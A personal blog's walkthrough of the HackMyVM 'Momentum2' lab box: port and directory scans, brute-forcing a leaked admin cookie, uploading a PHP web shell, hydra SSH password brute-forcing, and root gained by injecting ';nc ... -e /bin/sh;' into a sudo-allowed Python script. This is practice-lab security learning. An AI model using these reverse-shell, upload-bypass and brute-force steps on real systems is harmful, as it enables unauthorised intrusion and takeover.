Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Momentum2 Walkthrough

HackMyVm Momentum2 Walkthrough

Scan ports.

 map -sV -sC -p-  -oN ports.log                                      sudo-0 | 0 [15:05:51]
 Starting Nmap 7.91 ( ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [-->]
 /css                  (Status: 301) [Size: 314] [-->]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [-->]
 /js                   (Status: 301) [Size: 313] [-->]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [-->]

Check ajax.php.bak. We need to set some parameter to upload php file.

 cat ajax.php.bak  
     //The boss told me to add one more Upper Case letter at the end of the cookie
    if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
        //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
         $valid_ext = array("txt");
    // Remember success upload returns 1 ⏎    

Generate dic file of cookies.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with shell code in it.

 cat cmd.php                                                                                                                                                                                   fish-0 | 0 [21:02:13]

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with burpsuite.

Send the request to Repeater, add cookie "admin=xxx", which we will bruteforce later, and add parameter "secure=val1d". Take care, it's not valid. If we click send now, response code will be 0, which means failed.

Then send it to intruder, add §§ sign to admin=§xxxxx§.

Set payload as cookie.txt we just generated.


Click start attack. Then we get the right cookie with response code 1.

And cmd.php has been uploaded to /owls.

Check if cmd.php works OK.

 ~ curl ''    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get reverse shell.

 curl ''
 nc -nlvp 1234                                                                    fish-0 | 130 [15:44:34]
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, found password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

Asterisk mark (*) means any character, we generate a dic.

 crunch 16 16 -t myvulnerableapp@ > dic.txt
 crunch 16 16 -t myvulnerableapp% >> dic.txt
 crunch 16 16 -t myvulnerableapp, >> dic.txt
 crunch 16 16 -t myvulnerableapp^ >> dic.txt

Bruteforce ssh with user name athena and this dic.

 hydra -l athena -P dic.txt ssh -f                                    fish-0 | 0 [15:25:54]
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 Hydra ( starting at 2021-05-31 15:26:17
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
 [DATA] attacking ssh://
 [22][ssh] host:   login: athena   password: myvulnerableapp*

Ssh login as athena, check sudo.

 athena@momentum2:~$ sudo -l
 Matching Defaults entries for athena on momentum2:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User athena may run the following commands on momentum2:
     (root) NOPASSWD: /usr/bin/python3 /home/team-tasks/

Run the py file, when asked for input seed, input shell code.

 sudo python3 /home/team-tasks/ 
 ~ Random Cookie Generation ~
 [!] for security reasons we keep logs about cookie seeds.
 Enter the seed : ;nc 1234 -e /bin/sh;

Listen to the port just input at another terminal, and get root shell.

 nc -nvlp 1234                                                                       man-0 | 0 [15:32:06]
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=0(root) gid=0(root) groups=0(root)



Powered By Z-BlogPHP 1.7.0